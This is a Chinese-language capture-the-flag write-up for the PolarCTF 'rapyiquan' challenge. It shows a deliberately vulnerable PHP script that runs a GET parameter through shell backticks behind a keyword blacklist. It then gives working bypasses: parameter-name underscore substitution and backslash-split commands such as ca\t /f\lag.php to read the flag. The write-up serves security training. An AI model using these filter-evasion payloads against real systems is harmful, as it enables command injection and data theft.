【PolarCTF】rapyiquan

复制代码
<?php
error_reporting(0);
highlight_file(__FILE__);
header('content-type:text/html;charset=utf-8');

$url = $_SERVER['REQUEST_URI'];
# strpos(原始字符串, 要查找的字符, [开始查找的位置])
# 表示需要匹配到_
function checkUrlParams($params) {
        if (strpos($params, '_') !== false) {
            return false;
        }
    return true;
}

if(checkUrlParams($url)){
    $cmd=$_GET['c_md'];
    if (preg_match("/ls|dir|flag|type|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
        echo("badly!");
    } else {
        echo `$cmd`;
    }
}else{
    echo "$url";
    echo "<br>";
    echo "Hack";
}

首先我们需要绕过checkUrlParams()函数,就是我们的url中不能出现_

但是GET用来传递的参数又是c_md那么我们就要想办法绕过

参数_符号的替代

我们可以使用下面3种情况来进行代替

复制代码
?c.md=whoami
?c[md=whoami
?c%20md=whoami

因为空格(%20)、点号、左方括号,在 PHP 解析 GET/POST 参数名时,会被自动换成下划线 _

使用\拆分命令绕过正则

接下来就是绕过正则表达式

复制代码
if (preg_match("/ls|dir|flag|type|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
        echo("badly!");
    } else {
        echo `$cmd`;
    }
}else{
    echo "$url";
    echo "<br>";
    echo "Hack";
}

这里我们可以使用\拆分技巧

在linux中有一个规则:

反斜杠 \ + 普通字符 = 普通字符

那么就是说

复制代码
c\at → cat
ca\t → cat
c\a\t → cat

但是这里有一个疑问,明明正则表达式是会过滤\为什么没有拦截

重点看这里

复制代码
\\|\\\\|

这行在 PHP 里最终解析成:

只匹配:一个反斜杠 \

而我们传入的是

复制代码
ca\t

这里的 \t 是 两个字符:\ + t

而不是单个\,因此绕过了正则表达式

通过下面的演示图就可以明显看到,正则表达式会把\s看成一起的从而绕过了正则表达式,但是在linux中又是支持\的写法的

然后我们直接读取/flag.php里面的内容

复制代码
?c[md=ca\t%20/f\lag.php

flag在网页源代码中

或者使用tac命令也是可以的,flag会直接出现在网页上

疑问:为什么tac会直接输出flag到网页上

相关推荐
Best-Wishes1 天前
BurpSuite Pro教育版在linux系统中配置
linux·运维·服务器·网络安全·burpsuite
菩提小狗1 天前
每日安全情报报告 · 2026-08-30
网络安全·漏洞·cve·安全情报·每日安全
黄俊懿2 天前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第八节:网关-注入攻击与预防
sql·网络安全·架构·系统架构·架构师·架构设计
黄俊懿2 天前
【架构师从入门到进阶】第五章:DNS&CDN&网关优化思路——第七节:网关-XSS攻击与预防
网关·网络安全·架构·系统架构·架构师·xss·架构设计
数据知道2 天前
.NET 反序列化漏洞——ViewState 与 BinaryFormatter 实战深度剖析
网络·网络安全·.net
HackTwoHub3 天前
Butter_Cookie 黄油曲奇|浏览器渗透插件,云存储检测、XSS、SQL 注入一站式 Web 安全测试工具
前端·sql·安全·web安全·网络安全·自动化·xss
AI备忘录3 天前
(十六)GRE/IPSec 隧道配置命令五厂商对照:华为 华三 锐捷 迈普 思科
运维·服务器·网络·网络协议·网络安全·华为
Eason_LYC3 天前
【GetShell】DataEase H2 JDBC远程命令执行漏洞(CVE-2025-32966+CVE-2025-49001)
网络安全·漏洞复现·dataease·白帽子·cve-2025-32966·cve-2025-49001·远程命令执行
白猫不黑3 天前
运维如何转安全(个人经验篇)
运维·学习·安全·web安全·网络安全·信息安全
Demons_kirit3 天前
PortSwigger网络缓存欺骗(4)
网络安全·缓存